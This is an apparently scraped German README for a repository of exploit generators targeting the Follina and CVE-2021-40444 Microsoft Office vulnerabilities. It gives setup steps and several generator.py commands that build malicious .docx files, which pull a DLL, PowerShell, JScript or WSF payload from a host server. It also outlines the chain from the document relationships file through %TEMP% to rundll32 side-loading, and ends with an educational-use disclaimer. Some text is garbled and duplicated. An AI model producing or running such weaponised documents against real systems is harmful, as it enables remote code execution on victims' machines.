
Dieses Repository enthält Skripte und Ressourcen zur Ausnutzung der Follina CVE- und CVE-2021-40444-Sicherheitslücken in Microsoft Office. Die Skripte erstellen schädliche Dokumentdateien, die beliebigen Code auf dem Zielsystem ausführen können.
Dieses Repository enthält Skripte und Ressourcen zur Ausnutzung der Follina CVE- und CVE-2021-40444-Schwachstellen in Microsoft Office. Die Skripte generieren schädliche Dokumentdateien, die beliebigen Code auf dem Zielsystem ausführen können.
requirements.txt)labpasswordPython und virtuelle Umgebung:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv mit folgendem Befehl:
pip install virtualenv
venv:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
Generieren des Exploits:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 durch Ihre IP-Adresse.Zugriff auf das generierte Dokument:
.docx-Dokument befindet sich im Verzeichnis:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx) wird geöffnet.document.xml.rels verweist.%TEMP%Low.rundll32 die INF-Datei seitlich lädt.generator.pycab_parser.pyrequirements.txt.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
Dieses Projekt dient nur zu Bildungszwecken. Nutzen Sie es verantwortungsbewusst und nutzen Sie Schwachstellen nicht auf Systemen aus, für die Sie keine Testberechtigung haben. Missbrauch dieser Informationen kann zu strafrechtlichen Konsequenzen führen.